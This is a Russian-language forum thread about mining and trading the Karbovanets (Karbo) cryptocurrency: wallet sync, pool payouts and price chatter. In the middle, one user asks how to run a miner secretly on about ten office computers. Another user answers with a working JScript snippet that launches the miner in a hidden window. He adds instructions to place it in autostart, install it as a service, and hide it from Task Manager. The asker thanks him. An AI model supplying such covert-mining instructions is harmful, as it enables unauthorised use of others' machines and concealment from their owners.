virtus
|
|
November 19, 2017, 01:36:15 PM |
|
нужно в свойствах папок включить показывать скрытые файлы и папки можно подождать пока в криптоматы куны добавят, но цена на тот момент будет возможно другая
через тотал командер смотрю, конечно все скрытые папки в настройках включены... чудеса) тогда поиском найди файл blocks.dat
|
|
|
|
PyJIb
Newbie
Activity: 19
Merit: 0
|
|
November 19, 2017, 01:37:16 PM |
|
А как выплаты с пула идут? расскажите
|
|
|
|
|
PyJIb
Newbie
|
|
November 19, 2017, 01:44:46 PM |
|
как-то сразу и не догадался изучить таблицу. Спасибо!
|
|
|
|
bitboo
Newbie
Activity: 5
|
|
November 19, 2017, 01:47:43 PM |
|
нужно в свойствах папок включить показывать скрытые файлы и папки можно подождать пока в криптоматы куны добавят, но цена на тот момент будет возможно другая
через тотал командер смотрю, конечно все скрытые папки в настройках включены... чудеса) тогда поиском найди файл blocks.datОказывается он находится сразу в папке Роаминг\карбованец... но нулевой длинны. Хотя если просмотром текста посмотреть там чтото было. Закрыл кошель (он еще синхронизировался). Перегрузит комп и вот оно - этот файл 800мб. Все. Спасибо за советы! ))
|
|
|
|
Sberex
|
|
November 19, 2017, 01:49:05 PM |
|
как-то сразу и не догадался изучить таблицу. Спасибо! Начинаете майнить на пуле, который вам больше нравится, как только по результатам присланных шар накопится минимальная сумма идет выплата, в примере ниже минимальная выплата 0,1 Карбо. Под надписью Payments перечисляются все выплаты, которые вам сделал пул.
|
|
|
|
virtus
|
|
November 19, 2017, 02:01:00 PM |
|
ты можешь свои 3штуки КАРБО не показывать, а то я как жаба буду завидовать
|
|
|
|
PyJIb
Newbie
|
|
November 19, 2017, 02:11:31 PM |
|
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно
|
|
|
|
virtus
|
|
November 19, 2017, 02:16:16 PM |
|
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно за 100 крб расскажу и покажу и дам. А вообще забей - компы уже ниче особо не намайнят офисные
|
|
|
|
Sberex
|
|
November 19, 2017, 02:16:27 PM |
|
ты можешь свои 3штуки КАРБО не показывать, а то я как жаба буду завидовать 3 штуки это не все... я же ни одного Карбо еще не продал
|
|
|
|
PyJIb
Newbie
|
|
November 19, 2017, 02:18:08 PM |
|
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно за 100 крб расскажу и покажу и дам. А вообще забей - компы уже ниче особо не намайнят офисные Я еще столько не намайнил У меня не особо чахлые лошадки, и3-и5 в распоряжении.
|
|
|
|
virtus
|
|
November 19, 2017, 02:21:31 PM |
|
Я еще столько не намайнил У меня не особо чахлые лошадки, и3-и5 в распоряжении. тогда учи программирование Да и в будущем пригодится, коль ты админ в офисе. п.с. ты ведь админ? как ты апще работает без таких знаний?
|
|
|
|
gymnast87
Member
Activity: 462
Merit: 12
quarkchain.io
|
|
November 19, 2017, 02:24:23 PM |
|
конечно рост в последнее время этой монеты поражает очень жалею,что не зашел ранее
|
|
|
|
xm0d532
Member
Activity: 70
Merit: 15
|
|
November 19, 2017, 02:48:28 PM |
|
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно есть несколько путей,самый простой:берешь вот этот код var WSHShell = WScript.CreateObject("WScript.Shell"); WSHShell.Run("xmr.exe",0); пихаешь в текстовый файл,делаешь расширение .js ,помещаешь его в папку с майнером.там где в кавычках xmr.exe пишешь екзешник своего майнера или батник,смотря как запускаешь...делаешь ярлык этого файла и в автозагрузку...все...еще можно установить майнер как службу...для того,чтобы скрыть процесс в диспечере задач нужны еще движения,но для простых офисных юзеров достаточно...
|
|
|
|
PyJIb
Newbie
|
|
November 19, 2017, 03:01:44 PM |
|
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно есть несколько путей,самый простой:берешь вот этот код var WSHShell = WScript.CreateObject("WScript.Shell"); WSHShell.Run("xmr.exe",0); пихаешь в текстовый файл,делаешь расширение .js ,помещаешь его в папку с майнером.там где в кавычках xmr.exe пишешь екзешник своего майнера или батник,смотря как запускаешь...делаешь ярлык этого файла и в автозагрузку...все...еще можно установить майнер как службу...для того,чтобы скрыть процесс в диспечере задач нужны еще движения,но для простых офисных юзеров достаточно... Возьму на заметку, спасибо!
|
|
|
|
xm0d532
Member
Activity: 70
Merit: 15
|
|
November 19, 2017, 04:08:33 PM |
|
подскажите,кто знает,где почитать,как поднять свою ноду...
|
|
|
|
virtus
|
|
November 19, 2017, 04:13:12 PM |
|
подскажите,кто знает,где почитать,как поднять свою ноду...
Все просто. Берешь и начинаешь с первого поста этой темы. Я думаю раз 50 УЖЕ ЭТО СПРАШИВАЛИ!
|
|
|
|
ZloiRediska
Member
Activity: 672
Merit: 22
|
|
November 19, 2017, 04:36:26 PM |
|
Каждый раз смотрю на нее и возникает одна мысль: почему я не зашел в монету прошлый раз... и так постоянно. Надо решаться!
|
|
|
|
serhishulak
Full Member
Activity: 159
Merit: 100
LuckyToken – Join ICO!!!
|
|
November 19, 2017, 04:38:20 PM |
|
конечно рост в последнее время этой монеты поражает очень жалею,что не зашел ранее
плюсую, очень недоверяю украинским и русским таким проектам, а этот вполне неплох оказался, молодцы ребята. но и сейчас не поздно майнить и покупать
|
|
|
|
Shurko-1987
Member
Activity: 742
Merit: 13
|
|
November 19, 2017, 04:51:43 PM |
|
Каждый раз смотрю на нее и возникает одна мысль: почему я не зашел в монету прошлый раз... и так постоянно. Надо решаться!
Дай то бог будет коррекция на монетку - вот тогда и зайдете. Главное дождаться этой самой коррекции. Всего то делов. P.S. Тут у некоторых ребят на ветке есть по 3 тыс. и более КАРБО ... Эх, мне бы такую сумму - жил бы не тужил.
|
|
|
|
|